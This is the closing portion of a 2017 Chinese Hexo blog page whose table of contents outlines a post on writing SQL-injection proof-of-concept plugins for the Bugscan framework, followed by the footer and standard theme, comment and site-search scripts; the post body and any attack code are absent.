              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#基于报错的-SQL-注入-PoC-编写"><span class="nav-number">1.</span> <span class="nav-text">基于报错的 SQL 注入 PoC 编写</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞分析"><span class="nav-number">1.1.</span> <span class="nav-text">漏洞分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞复现"><span class="nav-number">1.2.</span> <span class="nav-text">漏洞复现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基于-Bugscan-框架编写POC"><span class="nav-number">1.3.</span> <span class="nav-text">基于 Bugscan 框架编写POC</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#说明"><span class="nav-number">1.4.</span> <span class="nav-text">说明</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于布尔的盲注的-SQL-注入-PoC-编写"><span class="nav-number">2.</span> <span class="nav-text">基于布尔的盲注的 SQL 注入 PoC 编写</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞分析-1"><span class="nav-number">2.1.</span> <span class="nav-text">漏洞分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞复现-1"><span class="nav-number">2.2.</span> <span class="nav-text">漏洞复现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基于-Bugscan-框架的扫描插件编写"><span class="nav-number">2.3.</span> <span class="nav-text">基于 Bugscan 框架的扫描插件编写</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于时间的盲注的-SQL-注入-PoC-编写"><span class="nav-number">3.</span> <span class="nav-text">基于时间的盲注的 SQL 注入 PoC 编写</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞分析-2"><span class="nav-number">3.1.</span> <span class="nav-text">漏洞分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞复现-2"><span class="nav-number">3.2.</span> <span class="nav-text">漏洞复现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基于-Bugscan-框架的扫描插件编写-1"><span class="nav-number">3.3.</span> <span class="nav-text">基于 Bugscan 框架的扫描插件编写</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        ﻿<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Y-HKL</span>
</div>


<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>

<!--
<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>
-->

<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共13.5k字</span>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  





  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  

    
      <script id="dsq-count-scr" src="https://.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://y-hkl.top/2017/09/16/基于报错布尔时间的SQL注入POC编写/';
          this.page.identifier = '2017/09/16/基于报错布尔时间的SQL注入POC编写/';
          this.page.title = '基于报错布尔时间的SQL注入POC编写';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  





  





  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.popup').toggle();
    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var $input = document.getElementById(search_id);
          var $resultContent = document.getElementById(content_id);
          $input.addEventListener('input', function(){
            var matchcounts = 0;
            var str='<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length > 1) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var content_index = [];
                var data_title = data.title.trim().toLowerCase();
                var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                var data_url = decodeURIComponent(data.url);
                var index_title = -1;
                var index_content = -1;
                var first_occur = -1;
                // only match artiles with not empty titles and contents
                if(data_title != '') {
                  keywords.forEach(function(keyword, i) {
                    index_title = data_title.indexOf(keyword);
                    index_content = data_content.indexOf(keyword);
                    if( index_title >= 0 || index_content >= 0 ){
                      isMatch = true;
                      if (i == 0) {
                        first_occur = index_content;
                      }
                    }

                  });
                }
                // show search results
                if (isMatch) {
                  matchcounts += 1;
                  str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                  var content = data.content.trim().replace(/<[^>]+>/g,"");
                  if (first_occur >= 0) {
                    // cut out 100 characters
                    var start = first_occur - 20;
                    var end = first_occur + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if(start == 0){
                      end = 50;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    var match_content = content.substring(start, end);
                    // highlight all keywords
                    keywords.forEach(function(keyword){
                      var regS = new RegExp(keyword, "gi");
                      match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                    });

                    str += "<p class=\"search-result\">" + match_content +"...</p>"
                  }
                  str += "</li>";
                }
              })};
            str += "</ul>";
            if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
            if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
            $resultContent.innerHTML = str;
          });
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>





  

  

  

  

</body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>